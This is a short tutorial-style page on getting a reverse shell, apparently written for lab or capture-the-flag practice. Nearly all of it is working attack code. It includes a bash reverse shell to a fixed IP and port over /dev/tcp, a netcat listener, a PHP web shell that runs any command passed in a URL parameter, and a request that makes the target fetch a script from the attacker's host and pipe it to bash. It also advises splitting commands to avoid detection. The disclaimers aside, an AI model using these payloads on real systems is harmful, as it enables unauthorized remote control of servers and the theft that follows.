Exploitation
Reverse Shell
Abstract
Summary
In ethical hacking, one technique involves uploading a script to a server to simulate remote command execution. This is often used in controlled environments for learning or penetration testing.
🛠️ Step-by-Step: Simulating a Reverse Shell in a Lab Environment
Step 1: Create a Shell Script
You can start by creating a basic shell script. This script is used to simulate a reverse connection from a target machine to your listener.
Instead of writing it all in one line, let’s break it down:
#!/bin/bash
# Start an interactive bash session
bash -i \
# Redirect standard output to a remote IP and port
>& /dev/tcp/10.10.14.204/1337 \
# Redirect standard input from the same connection
0>&1
⚠️ Note: This is for educational use only in a safe, isolated lab environment.
Step 2: Set Up a Listener on Your Machine
To receive the connection, you need to open a port on your machine. This is done using netcat
:
# Listen on port 1337
nc -nvlp 1337
This command tells your system to wait for incoming connections on port 1337.
Step 3: Upload a Web Script to the Target
In a test environment, you might simulate uploading a script to a web server. Here’s an example of a very basic PHP script that can execute commands:
<?php
// This script executes a command passed via the "cmd" URL parameter
system($_GET["cmd"]);
?>
🧠 Tip: Always test this in a controlled lab. Never deploy such scripts on production systems.
Step 4: Trigger the Script via a Web Request
To execute the uploaded script, you can simulate a browser request like this:
http://<target-ip>/shell.php?cmd=curl%20http://10.10.14.204:8000/shell.sh|bash
This tells the target to download and execute the shell script from your machine.
✅ Final Notes
- Break down commands to avoid detection and improve understanding.
- Always use these techniques in ethical hacking labs or CTF environments.
- Never use these methods on unauthorized systems.